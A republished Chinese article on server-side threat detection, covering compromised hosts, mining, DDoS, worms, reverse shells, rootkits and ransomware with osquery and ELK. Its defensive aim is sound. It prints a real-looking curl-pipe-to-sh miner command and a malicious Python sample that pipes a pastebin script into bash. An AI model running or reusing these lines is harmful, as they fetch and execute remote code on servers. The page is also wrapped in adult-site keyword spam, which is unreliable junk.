国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

態勢感知——服務器安全策略探索

運維 服務器運維
企業IT架構數字化轉型的大潮中,往往會面臨各種各樣的安全威脅,包括:系統和應用軟件漏洞利用攻擊,APT攻擊,數據泄露,云服務器濫用,DDoS攻擊等。同時為了應對速度越來越快的網絡犯罪攻擊,以及針對性攻擊的多態化。為我們安全人員提出了更高的要求。

 0x00、業務需求

企業IT架構數字化轉型的大潮中,往往會面臨各種各樣的安全威脅,包括:系統和應用軟件漏洞利用攻擊,APT攻擊,數據泄露,云服務器濫用,DDoS攻擊等。同時為了應對速度越來越快的網絡犯罪攻擊,以及針對性攻擊的多態化。為我們安全人員提出了更高的要求。

在做應急響應安全事件過程的過程中,確認攻擊痕跡一般從以下幾個方面:

0x01、服務器安全告警

在態勢感知產品中,在服務器上部署EDR終端是一個很好的服務器安全量化的一個過程。因為我們在服務器上可以收集進程、端口、賬號、軟件以及文件目錄基礎的安全數據。通過這些基礎數據通過后臺大數據分析加工形成我們感知到威脅。

本篇主要從服務器端做檢測,服務器端檢測有以下優勢:

  • 單純的網絡層威脅檢測無法和終端數據聯動,形成的證據鏈可信度低。
  • 加密連接,通過SSL的bash反連等,無法通過網絡檢測,需要深度學習檢測,檢測成本過高。
  • threat hunting需求,可以更深入調查,包括獲取惡意程序。

那么我們先從入侵行為分析開始:

  • 失陷主機

檢測思路:需要收集服務器端基礎數據: 實時網絡連接數據,同時需要商業威脅情報數據源。

實時網絡連接數據,實驗環境搭建:通過kolide+osquery+ElasticSearch+kibana。

實現步驟:

1、從服務器端獲取基礎外聯網絡數據。

2、通過flink或者spark streaming做實時Top進程、Top外聯IP統計,分析所有服務器上傳的外聯孤島數據,也可以編輯規則重點監控下載應用程序,或者下載對端的應用如果是HFS服務。需要重點關注。當然這里可以玩的playbook很多,需要用戶自己挖掘。

3、從中獲取到應有程序路徑、對外連接IP信息,以及端口。通過IP地址查詢威脅情報,如果對端IP地址使用的C2、Tor、VPN、SS等地址視為失陷主機。態勢感知——服務器安全策略探索

  • 對外可疑連接

檢測思路:這里主要是增加內容特征,比如說:上傳設備基本信息、發送攻擊指令、獲取公網IP地址、黑客攻擊連接等。服務器端需要把惡意程序上傳云查殺或者云沙箱做深入檢測。

實驗環境:Malice(支持Yara+多殺毒引擎集成+virustotal)+ClamAV +ElasticSearch+kibana。

IDS檢測規則完善:

當然需要一個安全Team維護這個規則。

檢測流程:

1、通過IDS檢測到對外連接。

2、通過網絡通訊進程關聯到文件。

3、上傳文件到云查殺系統中檢測。如果發現病毒告警。

  • 對外DDoS

檢測思路:通過獲取實時進程快照,網絡對外連接快照,網絡層獲取其流量信息,同時也上傳對應的進程文件到云查殺和云沙箱檢測。在網絡層檢測通過IDS規則檢測到對外DDoS攻擊最多為:NTP反射攻擊、memcache反射攻擊。但是在服務器端檢測會發現更多攻擊方式,例如:CC攻擊、SIP協議攻擊、視頻協議攻擊、SYN Flood、ACK Flood等。當然需要客戶端抓包進一步確認。

檢測流程:

1、獲取進程快照,網絡對外連接快照,對外連接網絡流量(需要驅動支持)或者獲取總流量。

2、執行抓包程序,采集服務器端Pcap包,上傳Pcap包樣本到服務器端。

3、通過各種DDoS攻擊規則過濾,如果發現預定的攻擊類型。

  • 挖礦檢測

檢測思路:特征是CPU占用率過高。通過上傳進程快照,同時獲取類似top命令CPU占用率信息。可以確定挖礦進程。當然還有 /bin/sh -c /usr/bin/curl -sL https://xmr.tgywl.cn|sh 直接挖礦。

檢測流程:

1、獲取進程快照,CPU占用率信息。

2、多次CPU占率過高的進程聚合。

3、上傳文件到云查殺系統中檢測。如果發現病毒告警。

4、復查各個端口被入侵的痕跡,如果產生以下攻擊告警,需要大數據關聯分析(flink or spark streaming)。

  • 對外爆破

檢測思路:關聯網絡層檢測和服務器端檢測相關進程。

檢測流程:

1、獲取進程快照,對外網絡連接快照。

2、獲取網絡層面各種協議的暴力破解告警。

3、使用flink or spark streaming 做大數據關聯分析。

  • 蠕蟲病毒

檢測思路:如果存在對外掃描功能,通過大數據分析網絡連接,短時間內過多連接視為可疑。

檢測流程:

1、獲取進程快照,對外網絡連接快照。

2、獲取網絡層面對外可疑連接告警。

3、上傳文件到云查殺系統中檢測。進一步分析,發現病毒標記為蠕蟲病毒告警。

  • 反彈shell

檢測思路:sh或者bash運行打開遠程連接,視為反彈shell。

檢測流程:

1、獲取進程快照,對外網絡連接快照。

2、查詢語句。

  1. "behavioral_reverse_shell": { 
  2.       "query" : "SELECT DISTINCT(processes.pid), processes.parent, processes.name, processes.path, processes.cmdline, processes.cwd, processes.root, processes.uid, processes.gid, processes.start_time, process_open_sockets.remote_address, process_open_sockets.remote_port, (SELECT cmdline FROM processes AS parent_cmdline WHERE pid=processes.parent) AS parent_cmdline FROM processes JOIN process_open_sockets USING (pid) LEFT OUTER JOIN process_open_files ON processes.pid = process_open_files.pid WHERE (name='sh' OR name='bash') AND remote_address NOT IN ('0.0.0.0', '::', '') AND remote_address NOT LIKE '10.%' AND remote_address NOT LIKE '192.168.%';"
  3.       "interval" : 600, 
  4.       "description" : "Find shell processes that have open sockets" 
  5.     }, 
  • rootkit檢測

我們先看一個入侵案例,以下腳本是用戶放到定時任務中的經過base64加密的腳本,通過替換curl、wget實現進程網絡通訊隱藏的目的。

  1. import os 
  2. import os.path 
  3.  
  4. def GetDeps(): 
  5.  
  6.    if os.path.isfile('/usr/bin/url'): 
  7.         os.system("mv /usr/bin/url /usr/bin/curl"
  8.         os.system("chmod 777 /usr/bin/curl"
  9.         os.system("chmod +x /usr/bin/curl"
  10.  
  11.     if os.path.isfile('/usr/bin/get'): 
  12.         os.system("mv /usr/bin/get /usr/bin/wget"
  13.         os.system("chmod 777 /usr/bin/wget"
  14.         os.system("chmod +x /usr/bin/wget"
  15.  
  16.     if not os.path.isfile('/usr/bin/wget'): 
  17.         os.system("yum clean all"
  18.         os.system("yum -y install wget"
  19.         os.system("apt-get update"
  20.         os.system("apt-get -y install wget"
  21.  
  22.     if not os.path.isfile('/usr/bin/curl'): 
  23.         os.system("yum clean all"
  24.         os.system("yum -y install curl"
  25.         os.system("apt-get update"
  26.         os.system("apt-get -y install wget"
  27.  
  28. if os.getuid()==0: 
  29.     GetDeps() 
  30. os.system("(curl -fsSL https://pastebin.com/raw/JuBCmASZ||wget -q -O- https://pastebin.com/raw/JuBCmASZ)|bash%7Cbash)"

由于存在我們安裝的服務器以前中過rootkit程序的情況。

檢測流程

1、需要從遠程下載wget\curl\ps\ls\netstat\ss等網絡和文件檢測工具

2、與本地對應的文件做對比檢測找到diff。

3、如果存在Diff,證明存在rootkit的惡意行為,告警。

  • 勒索軟件

檢測思路:

1、上傳文件創建基礎數據信息、上傳進程快照信息。

2、統計平時文件創建數據,設置動態基礎數據基線。

3、如果單臺服務器創建量超出平時2倍以上,需要把對應的文件上傳到云查殺分析,如果發現勒索軟件病毒標簽告警。

0x03、總結

服務器安全檢測是一項非常繁瑣,并且特殊情況比較多的工作,需要這些檢測規則和手段自動化成威脅模型。同時,人工threat huning結果也要不斷加入,形成正向反饋,良性循環。

責任編輯:武曉燕 來源: 4hou
相關推薦

2011-03-08 15:16:02

2013-05-03 14:25:32

2010-08-02 23:34:08

NFS服務器

2009-12-04 10:24:25

2022-03-19 00:09:59

態勢感知網絡安全

2010-09-29 13:38:23

NFS服務器

2018-11-26 08:12:54

2014-04-21 10:24:06

2009-07-11 18:54:05

2022-01-16 06:57:12

安全態勢網絡安全IT安全

2010-03-10 11:31:31

2017-04-25 06:34:30

2020-02-02 09:23:44

軟件安全滲透測試信息安全

2015-09-02 10:21:55

2022-01-14 14:56:17

網絡安全信息安全技術

2022-03-24 08:02:39

網絡安全端點

2020-02-21 10:44:21

網絡安全態勢感知漏洞分析

2020-02-27 16:23:19

網絡安全態勢

2017-02-07 09:28:29

云安全策略云計算

2022-02-13 00:13:26

云安全數據安全
點贊
收藏

51CTO技術棧公眾號

亚洲欧美日韩国产中文| 久久超碰亚洲| 原纱央莉成人av片| 欧美日韩免费在线| 久久久久久香蕉| 国产成人精品一区二 | 中文国产字幕在线观看| 日韩欧美在线观看视频| 粉嫩欧美一区二区三区| 亚洲男同性恋视频| 久久mv成人精品亚洲动漫| 国产精品初高中害羞小美女文 | 精品一区二区在线看| 日韩精品一区二区三区四区五区| 女人天堂亚洲aⅴ在线观看| 97视频人免费观看| 欧美男人操女人视频| **欧美日韩vr在线| 久久91精品| 国产自摸综合网| 久久在线电影| 91免费看片网站| 久久久久免费av| 国产传媒一区二区三区| 欧美精品一卡| 九色视频成人porny| 一区二区国产精品| 欧美日韩高清在线一区| 麻豆免费精品视频| 波多野结衣av一区二区全免费观看| 国产精品亚洲专一区二区三区 | 黄色av网站在线观看| 一区二区在线免费| 中文在线观看视频| 精品视频一区 二区 三区| 巨大荫蒂视频欧美大片| 欧美va亚洲va| 日韩一级特黄| 国产精品美腿一区在线看| 一区二区三区在线观看免费| 国产亚洲欧美另类一区二区三区| 日韩精品成人一区二区在线| ijzzijzzij亚洲大全| 国产成人超碰人人澡人人澡| 爱情岛论坛亚洲首页入口章节| 亚洲电影一区二区三区| 成人直播在线| 久久91精品国产91久久跳| 国产探花在线精品一区二区| 国产一区自拍视频| 国产成人午夜视频| 美女视频免费观看网站在线 | 亚洲乱码国产乱码精品精天堂| 欧美a视频在线| 国产精品人成电影在线观看| 国产精品久久久久久模特| 老司机激情视频| 一区二区三区丝袜| 国产精品69xx| 97视频在线观看视频免费视频| 亚洲欧美一级二级三级| 欧美日韩激情四射| 亚洲女子a中天字幕| 中文av资源在线| 97人人模人人爽人人喊中文字| 狠狠入ady亚洲精品| 日本香蕉视频在线观看| 亚洲亚洲精品在线观看| 97人人爽人人澡人人精品| 国产91精品视频在线观看| 久久精品女人天堂| 先锋影音资源999| 精品91自产拍在线观看一区| 欧美亚洲大陆| 超碰在线免费观看97| 亚洲综合男人的天堂| 77thz桃花论族在线观看| 国产精品v日韩精品| 国产精品一区二区视频| 色视频www在线播放| 亚洲视频免费一区| 亚洲一区二区三区无吗| 黄色一级视频在线播放| 欧美一a一片一级一片| 免费观看亚洲天堂| 日韩色妇久久av| 亚洲综合一区在线| 成人午夜亚洲| 久久综合一区| 黄色成人av网| 粉嫩精品导航导航| 成人午夜免费剧场| 欧美嫩在线观看| 精品国产一区探花在线观看| 97超碰在线人人| 欧美日韩免费观看一区三区| 狼人精品一区二区三区在线| 老司机激情视频| 欧美一级免费观看| 国产精品88久久久久久| 亚洲五月天综合| 亚洲女人天堂色在线7777| 激情六月综合| 视频在线91| 91国内精品久久| 国产成人免费在线观看| 日本孕妇大胆孕交无码| 操人视频欧美| 婷婷综合另类小说色区| 另类ts人妖一区二区三区| 九色自拍视频在线观看| 日韩高清不卡av| 日日骚欧美日韩| 免费看美女视频在线网站| 国产在线高清精品| 国产精品久久久99| 日韩中文字幕一区二区高清99| 精品国偷自产一区二区三区| 日韩av中文字幕在线播放| 久久精品在线| 黄色一级大片在线免费看产| 岛国视频一区| 日本高清免费不卡视频| 图片小说视频色综合| 性xxxx丰满孕妇xxxx另类| 成人免费高清完整版在线观看| 一区av在线播放| 妖精一区二区三区精品视频| 啊啊啊好爽视频| 国产精品精品国产| 亚洲在线中文字幕| 秋霞欧美视频| 最近97中文超碰在线| 91久久精品国产| 一本一道综合狠狠老| 欧美三级免费| 天堂а√在线资源在线| 国产精品亚洲一区| 69堂精品视频| 日本欧美一区二区| 免费电影日韩网站| 欧美精品一区二区三区三州| 精品国产一区二区在线| 亚洲国产成人自拍| 免费欧美一区| 深夜视频在线免费| 好吊色欧美一区二区三区| 日韩欧美二区三区| 国产a视频精品免费观看| 96sao精品免费视频观看| 久久精品免费网站| 国产精品视频在线观看| 欧美日韩综合在线免费观看| 久久一区亚洲| 在线看欧美视频| 三级黄色的网站| yy111111少妇影院日韩夜片 | 日韩中文在线中文网在线观看| 97se亚洲国产综合自在线| 99精品在免费线中文字幕网站一区| 亚洲久久中文字幕| 91人成网站www| 日韩欧美电影一区| 成人动漫中文字幕| 日韩电影不卡一区| av二区在线| 免费人成自慰网站| 青青在线视频一区二区三区| 91福利国产精品| 激情综合亚洲精品| 精品精品精品| 欧美黄色激情| 免费观看日韩毛片| 国产欧美在线看| 精品国产乱子伦一区| 久久精品夜色噜噜亚洲a∨| 999精品一区| 竹内纱里奈兽皇系列在线观看| 黄色成人免费看| 国产伦精品一区二区三区免| 中文日韩在线观看| 大伊人狠狠躁夜夜躁av一区 | 亚洲精品日韩在线观看| 欧美成人精品三级在线观看| 午夜视频一区在线观看| 免费观看久久久4p| 九九热播视频在线精品6| 91精品大全| 国产xxxxx视频| 国新精品乱码一区二区三区18| 亚洲一级一级97网| 精品久久久久久| youjizz国产精品| 黄色成人av网站| 日韩精品三级| 成人福利影视| 国产精品腿扒开做爽爽爽挤奶网站| 久久久久国产精品午夜一区| 欧美日韩一视频区二区| 99久久.com|